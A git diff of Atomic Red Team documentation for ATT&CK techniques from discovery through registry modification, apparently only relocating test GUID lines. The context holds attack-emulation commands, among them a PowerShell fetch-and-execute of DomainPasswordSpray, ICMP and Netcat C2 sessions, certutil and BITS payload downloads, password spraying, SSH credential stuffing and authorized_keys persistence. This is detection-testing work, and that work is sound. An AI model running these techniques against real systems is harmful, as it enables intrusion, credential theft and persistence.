## Atomic Test #9 - Griffon Recon - -auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 - Griffon is a sophisticated tool believed to be in use by one of more "APT" groups. This atomic is for detecting, specifically, the reconnaissance part of the tool. This script used here was reduced by security researcher Kirk Sayre (github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d), and it gives the exact same recon behavior as the original (minus the C2 interaction). For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon and https://attack.mitre.org/software/S0417/ + **Supported Platforms:** Windows +**auto_generated_guid:** 69bd4abe-8759-49a6-8d21-0f15822d6370 + + + #### Inputs: @@ -303,13 +321,15 @@ cscript #{vbscript}
## Atomic Test #10 - Environment variables discovery on windows - -auto_generated_guid: f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 - Identify all environment variables. Upon execution, environments variables and your path info will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 + + + @@ -329,13 +349,15 @@ set
## Atomic Test #11 - Environment variables discovery on macos and linux - -auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 - Identify all environment variables. Upon execution, environments variables and your path info will be displayed. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720 + + + diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index 7bd81b17..6003c66b 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -18,14 +18,16 @@ Many command shell utilities can be used to obtain this information. Examples in
## Atomic Test #1 - File and Directory Discovery (cmd.exe) - -auto_generated_guid: 0e36303b-6762-4500-b003-127743b80ba6 - Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of all of the data discovery commands. + **Supported Platforms:** Windows +**auto_generated_guid:** 0e36303b-6762-4500-b003-127743b80ba6 + + + @@ -51,13 +53,15 @@ tree /F >> %temp%\download
## Atomic Test #2 - File and Directory Discovery (PowerShell) - -auto_generated_guid: 2158908e-b7ef-4c21-8a83-3ce4dd05a924 - Find or discover files on the file system. Upon execution, file and folder information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 2158908e-b7ef-4c21-8a83-3ce4dd05a924 + + + @@ -79,9 +83,6 @@ gci -recurse
## Atomic Test #3 - Nix File and Diectory Discovery - -auto_generated_guid: ffc8b249-372a-4b74-adcd-e4c0430842de - Find or discover files on the file system References: @@ -89,9 +90,14 @@ References: http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/ https://perishablepress.com/list-files-folders-recursively-terminal/ + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** ffc8b249-372a-4b74-adcd-e4c0430842de + + + #### Inputs: @@ -127,13 +133,15 @@ rm #{output_file}
## Atomic Test #4 - Nix File and Directory Discovery 2 - -auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e - Find or discover files on the file system + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 13c5e1ae-605b-46c4-a79f-db28c77ff24e + + + #### Inputs: diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md index 98eebaf4..065f757c 100644 --- a/atomics/T1087.001/T1087.001.md +++ b/atomics/T1087.001/T1087.001.md @@ -32,13 +32,15 @@ Commands such as net user and net localgroup of the [N
## Atomic Test #1 - Enumerate all accounts (Local) - -auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f - Enumerate all accounts by copying /etc/passwd to another file + **Supported Platforms:** Linux +**auto_generated_guid:** f8aab3dd-5990-4bf8-b8ab-2226c951696f + + + #### Inputs: @@ -68,13 +70,15 @@ rm -f #{output_file}
## Atomic Test #2 - View sudoers access - -auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 - (requires root) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** fed9be70-0186-4bde-9f8a-20945f9370c2 + + + #### Inputs: @@ -104,13 +108,15 @@ rm -f #{output_file}
## Atomic Test #3 - View accounts with UID 0 - -auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 - View accounts with UID 0 + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** c955a599-3653-4fe5-b631-f11c00eb0397 + + + #### Inputs: @@ -140,13 +146,15 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #4 - List opened files by user - -auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb - List opened files by user + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb + + + @@ -166,13 +174,15 @@ username=$(id -u -n) && lsof -u $username
## Atomic Test #5 - Show if a user account has ever logged in remotely - -auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 - Show if a user account has ever logged in remotely + **Supported Platforms:** Linux +**auto_generated_guid:** 0f0b6a29-08c3-44ad-a30b-47fd996b2110 + + + #### Inputs: @@ -214,13 +224,15 @@ echo "Install lastlog on the machine to run the test."; exit 1;
## Atomic Test #6 - Enumerate users and groups - -auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e - Utilize groups and id to enumerate users and groups + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** e6f36545-dc1e-47f0-9f48-7f730f54a02e + + + @@ -241,13 +253,15 @@ id
## Atomic Test #7 - Enumerate users and groups - -auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 - Utilize local utilities to enumerate users and groups + **Supported Platforms:** macOS +**auto_generated_guid:** 319e9f6c-7a9e-432e-8c62-9385c803b6f2 + + + @@ -271,14 +285,16 @@ dscacheutil -q user
## Atomic Test #8 - Enumerate all accounts on Windows (Local) - -auto_generated_guid: 80887bec-5a9b-4efc-a81d-f83eb2eb32ab - Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session + **Supported Platforms:** Windows +**auto_generated_guid:** 80887bec-5a9b-4efc-a81d-f83eb2eb32ab + + + @@ -302,13 +318,15 @@ net localgroup
## Atomic Test #9 - Enumerate all accounts via PowerShell (Local) - -auto_generated_guid: ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b - Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b + + + @@ -336,13 +354,15 @@ net localgroup
## Atomic Test #10 - Enumerate logged on users via CMD (Local) - -auto_generated_guid: a138085e-bfe5-46ba-a242-74a6fb884af3 - Enumerate logged on users. Upon exeuction, logged on users will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a138085e-bfe5-46ba-a242-74a6fb884af3 + + + @@ -362,13 +382,15 @@ query user
## Atomic Test #11 - Enumerate logged on users via PowerShell - -auto_generated_guid: 2bdc42c7-8907-40c2-9c2b-42919a00fe03 - Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 2bdc42c7-8907-40c2-9c2b-42919a00fe03 + + + diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index 8949d5be..02fd9e3e 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -30,14 +30,16 @@ Commands such as net user /domain and net group /domain ## Atomic Test #1 - Enumerate all accounts (Domain) - -auto_generated_guid: 6fbc9e68-5ad7-444a-bd11-8bf3136c477e - Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session + **Supported Platforms:** Windows +**auto_generated_guid:** 6fbc9e68-5ad7-444a-bd11-8bf3136c477e + + + @@ -58,13 +60,15 @@ net group /domain
## Atomic Test #2 - Enumerate all accounts via PowerShell (Domain) - -auto_generated_guid: 8b8a6449-be98-4f42-afd2-dedddc7453b2 - Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 8b8a6449-be98-4f42-afd2-dedddc7453b2 + + + @@ -86,13 +90,15 @@ get-aduser -filter *
## Atomic Test #3 - Enumerate logged on users via CMD (Domain) - -auto_generated_guid: 161dcd85-d014-4f5e-900c-d3eaae82a0f7 - Enumerate logged on users. Upon exeuction, logged on users will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 161dcd85-d014-4f5e-900c-d3eaae82a0f7 + + + #### Inputs: @@ -117,14 +123,16 @@ query user /SERVER:#{computer_name}
## Atomic Test #4 - Automated AD Recon (ADRecon) - -auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 - ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 95018438-454a-468c-a0fa-59c800149b59 + + + #### Inputs: @@ -166,14 +174,16 @@ Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRe
## Atomic Test #5 - Adfind -Listing password policy - -auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600 - Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx + **Supported Platforms:** Windows +**auto_generated_guid:** 736b4f53-f400-4c22-855d-1a6b5a551600 + + + #### Inputs: @@ -210,14 +220,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #6 - Adfind - Enumerate Active Directory Admins - -auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/ + **Supported Platforms:** Windows +**auto_generated_guid:** b95fd967-4e62-4109-b48d-265edfd28c3a + + + #### Inputs: @@ -254,14 +266,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #7 - Adfind - Enumerate Active Directory User Objects - -auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 + + + #### Inputs: @@ -298,14 +312,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #8 - Adfind - Enumerate Active Directory Exchange AD Objects - -auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 5e2938fb-f919-47b6-8b29-2f6a1f718e99 + + + #### Inputs: @@ -342,13 +358,15 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #9 - Enumerate Default Domain Admin Details (Domain) - -auto_generated_guid: c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef - This test will enumerate the details of the built-in domain admin account + **Supported Platforms:** Windows +**auto_generated_guid:** c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef + + + @@ -368,16 +386,18 @@ net user administrator /domain
## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation - -auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b - Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + **Supported Platforms:** Windows +**auto_generated_guid:** 46f8dbe9-22a5-4770-8513-66119c5be63b + + + #### Inputs: diff --git a/atomics/T1090.001/T1090.001.md b/atomics/T1090.001/T1090.001.md index ba88f77c..7e9471af 100644 --- a/atomics/T1090.001/T1090.001.md +++ b/atomics/T1090.001/T1090.001.md @@ -16,15 +16,17 @@ By using a compromised internal system as a proxy, adversaries may conceal the t
## Atomic Test #1 - Connection Proxy - -auto_generated_guid: 0ac21132-4485-4212-a681-349e8a6637cd - Enable traffic redirection. Note that this test may conflict with pre-existing system configuration. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 0ac21132-4485-4212-a681-349e8a6637cd + + + #### Inputs: @@ -55,16 +57,18 @@ unset https_proxy
## Atomic Test #2 - Connection Proxy for macOS UI - -auto_generated_guid: 648d68c1-8bcd-4486-9abe-71c6655b6a2c - Enable traffic redirection on macOS UI (not terminal). The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface. Note that this test may conflict with pre-existing system configuration. + **Supported Platforms:** macOS +**auto_generated_guid:** 648d68c1-8bcd-4486-9abe-71c6655b6a2c + + + #### Inputs: @@ -97,15 +101,17 @@ networksetup -setsecurewebproxystate #{interface} off
## Atomic Test #3 - portproxy reg key - -auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a - Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 Upon execution there will be a new proxy entry in netsh netsh interface portproxy show all + **Supported Platforms:** Windows +**auto_generated_guid:** b8223ea9-4be2-44a6-b50a-9657a3d4e72a + + + #### Inputs: diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md index 35f06246..998ff39b 100644 --- a/atomics/T1095/T1095.md +++ b/atomics/T1095/T1095.md @@ -17,14 +17,16 @@ ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Ev
## Atomic Test #1 - ICMP C2 - -auto_generated_guid: 0268e63c-e244-42db-bef7-72a9e59fc1fc - This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/ + **Supported Platforms:** Windows +**auto_generated_guid:** 0268e63c-e244-42db-bef7-72a9e59fc1fc + + + #### Inputs: @@ -50,15 +52,17 @@ Invoke-PowerShellIcmp -IPAddress #{server_ip}
## Atomic Test #2 - Netcat C2 - -auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 - Start C2 Session Using Ncat To start the listener on a Linux device, type the following: nc -l -p + **Supported Platforms:** Windows +**auto_generated_guid:** bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 + + + #### Inputs: @@ -106,15 +110,17 @@ if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\
## Atomic Test #3 - Powercat C2 - -auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e - Start C2 Session Using Powercat To start the listener on a Linux device, type the following: nc -l -p + **Supported Platforms:** Windows +**auto_generated_guid:** 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e + + + #### Inputs: diff --git a/atomics/T1098.004/T1098.004.md b/atomics/T1098.004/T1098.004.md index 6aefc212..e3e11db8 100644 --- a/atomics/T1098.004/T1098.004.md +++ b/atomics/T1098.004/T1098.004.md @@ -12,14 +12,16 @@ Adversaries may modify SSH authorized_keys files directly with scri
## Atomic Test #1 - Modify SSH Authorized Keys - -auto_generated_guid: 342cc723-127c-4d3a-8292-9c0c6b4ecadc - Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 342cc723-127c-4d3a-8292-9c0c6b4ecadc + + + diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index b4409385..ff4d250c 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -12,13 +12,15 @@
## Atomic Test #1 - Admin Account Manipulate - -auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af - Manipulate Admin Account Name + **Supported Platforms:** Windows +**auto_generated_guid:** 5598f7cb-cf43-455e-883a-f6008c5d46af + + + @@ -64,9 +66,6 @@ foreach($u in $list) {
## Atomic Test #2 - Domain Account and Group Manipulate - -auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 - Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively, @@ -79,9 +78,14 @@ service account whose delegation is given onto a dedicated OU for user creation as group manager of the target group. Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }` + **Supported Platforms:** Windows +**auto_generated_guid:** a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 + + + #### Inputs: diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 4003a30d..caef3d08 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -36,13 +36,15 @@
## Atomic Test #1 - rsync remote file copy (push) - -auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 - Utilize rsync to perform a remote file copy (push) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409 + + + #### Inputs: @@ -70,13 +72,15 @@ rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
## Atomic Test #2 - rsync remote file copy (pull) - -auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f - Utilize rsync to perform a remote file copy (pull) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f + + + #### Inputs: @@ -104,13 +108,15 @@ rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
## Atomic Test #3 - scp remote file copy (push) - -auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 - Utilize scp to perform a remote file copy (push) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344 + + + #### Inputs: @@ -138,13 +144,15 @@ scp #{local_file} #{username}@#{remote_host}:#{remote_path}
## Atomic Test #4 - scp remote file copy (pull) - -auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 - Utilize scp to perform a remote file copy (pull) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33 + + + #### Inputs: @@ -172,13 +180,15 @@ scp #{username}@#{remote_host}:#{remote_file} #{local_path}
## Atomic Test #5 - sftp remote file copy (push) - -auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e - Utilize sftp to perform a remote file copy (push) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e + + + #### Inputs: @@ -206,13 +216,15 @@ sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
## Atomic Test #6 - sftp remote file copy (pull) - -auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef - Utilize sftp to perform a remote file copy (pull) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef + + + #### Inputs: @@ -240,13 +252,15 @@ sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
## Atomic Test #7 - certutil download (urlcache) - -auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 - Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! + **Supported Platforms:** Windows +**auto_generated_guid:** dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 + + + #### Inputs: @@ -276,13 +290,15 @@ del #{local_path} >nul 2>&1
## Atomic Test #8 - certutil download (verifyctl) - -auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b - Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! + **Supported Platforms:** Windows +**auto_generated_guid:** ffd492e3-0455-4518-9fb1-46527c9f241b + + + #### Inputs: @@ -316,14 +332,16 @@ Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorActi
## Atomic Test #9 - Windows - BITSAdmin BITS Download - -auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b - This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads. + **Supported Platforms:** Windows +**auto_generated_guid:** a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b + + + #### Inputs: @@ -350,14 +368,16 @@ C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{re
## Atomic Test #10 - Windows - PowerShell Download - -auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 - This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families. + **Supported Platforms:** Windows +**auto_generated_guid:** 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 + + + #### Inputs: @@ -387,13 +407,15 @@ Remove-Item #{destination_path} -Force -ErrorAction Ignore
## Atomic Test #11 - OSTAP Worming Activity - -auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad - OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. + **Supported Platforms:** Windows +**auto_generated_guid:** 2ca61766-b456-4fcf-a35a-1233685e1cad + + + #### Inputs: @@ -423,14 +445,16 @@ popd
## Atomic Test #12 - svchost writing a file to a UNC path - -auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f - svchost.exe writing a non-Microsoft Office file to a file with a UNC path. Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file. + **Supported Platforms:** Windows +**auto_generated_guid:** fa5a2759-41d7-4e13-a19c-e8f28a53566f + + + @@ -456,17 +480,19 @@ del C:\\svchost.exe >nul 2>&1
## Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe - -auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc - Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory. More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ + **Supported Platforms:** Windows +**auto_generated_guid:** 815bef8b-bf91-4b67-be4c-abe4c2a94ccc + + + #### Inputs: @@ -514,13 +540,15 @@ Write-Host "Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 m
## Atomic Test #14 - whois file download - -auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab - Download a remote file using the whois utility + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab + + + #### Inputs: diff --git a/atomics/T1106/T1106.md b/atomics/T1106/T1106.md index 4f7c9b48..0e25b7fe 100644 --- a/atomics/T1106/T1106.md +++ b/atomics/T1106/T1106.md @@ -16,13 +16,15 @@ Adversaries may abuse these native API functions as a means of executing behavio
## Atomic Test #1 - Execution through API - CreateProcess - -auto_generated_guid: 99be2089-c52d-4a4a-b5c3-261ee42c8b62 - Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt. + **Supported Platforms:** Windows +**auto_generated_guid:** 99be2089-c52d-4a4a-b5c3-261ee42c8b62 + + + #### Inputs: diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index c62f01f1..03513e36 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -33,13 +33,15 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
## Atomic Test #1 - Brute Force Credentials of all domain users via SMB - -auto_generated_guid: 09480053-2f98-4854-be6e-71ae5f672224 - Creates username and password files then attempts to brute force on remote host + **Supported Platforms:** Windows +**auto_generated_guid:** 09480053-2f98-4854-be6e-71ae5f672224 + + + #### Inputs: @@ -71,13 +73,15 @@ echo "Password!" >> #{input_file_passwords}
## Atomic Test #2 - Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) - -auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250 - Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos + **Supported Platforms:** Windows +**auto_generated_guid:** c2969434-672b-4ec8-8df0-bbb91f40e250 + + + #### Inputs: diff --git a/atomics/T1110.002/T1110.002.md b/atomics/T1110.002/T1110.002.md index 7157b87b..67d78ecd 100644 --- a/atomics/T1110.002/T1110.002.md +++ b/atomics/T1110.002/T1110.002.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Password Cracking with Hashcat - -auto_generated_guid: 6d27df5d-69d4-4c91-bc33-5983ffe91692 - Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against + **Supported Platforms:** Windows +**auto_generated_guid:** 6d27df5d-69d4-4c91-bc33-5983ffe91692 + + + #### Inputs: diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md index b5cb5bd3..b8450e15 100644 --- a/atomics/T1110.003/T1110.003.md +++ b/atomics/T1110.003/T1110.003.md @@ -33,16 +33,18 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
## Atomic Test #1 - Password Spray all Domain Users - -auto_generated_guid: 90bc2e54-6c84-47a5-9439-0a2a92b4b175 - CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently. This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt. See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5 + **Supported Platforms:** Windows +**auto_generated_guid:** 90bc2e54-6c84-47a5-9439-0a2a92b4b175 + + + #### Inputs: @@ -79,15 +81,17 @@ PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
## Atomic Test #2 - Password Spray (DomainPasswordSpray) - -auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b - Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain https://github.com/dafthack/DomainPasswordSpray + **Supported Platforms:** Windows +**auto_generated_guid:** 263ae743-515f-4786-ac7d-41ef3a0d4b2b + + + #### Inputs: @@ -113,15 +117,17 @@ IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb725
## Atomic Test #3 - Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) - -auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d - Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users) + **Supported Platforms:** Windows +**auto_generated_guid:** f14d956a-5b6e-4a93-847f-0c415142f07d + + + #### Inputs: diff --git a/atomics/T1110.004/T1110.004.md b/atomics/T1110.004/T1110.004.md index 8f7114b7..fb33c74f 100644 --- a/atomics/T1110.004/T1110.004.md +++ b/atomics/T1110.004/T1110.004.md @@ -31,13 +31,15 @@ In addition to management services, adversaries may "target single sign-on (SSO)
## Atomic Test #1 - SSH Credential Stuffing From Linux - -auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad - Using username,password combination from a password dump to login over SSH. + **Supported Platforms:** Linux +**auto_generated_guid:** 4f08197a-2a8a-472d-9589-cd2895ef22ad + + + #### Inputs: @@ -75,13 +77,15 @@ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | g
## Atomic Test #2 - SSH Credential Stuffing From MacOS - -auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b - Using username,password combination from a password dump to login over SSH. + **Supported Platforms:** macOS +**auto_generated_guid:** d546a3d9-0be5-40c7-ad82-5a7d79e1b66b + + + #### Inputs: diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 119a4d22..1214c378 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -26,14 +26,16 @@ The Registry of a remote system may be modified to aid in execution of files as
## Atomic Test #1 - Modify Registry of Current User Profile - cmd - -auto_generated_guid: 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 - Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. + **Supported Platforms:** Windows +**auto_generated_guid:** 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 + + + @@ -57,15 +59,17 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
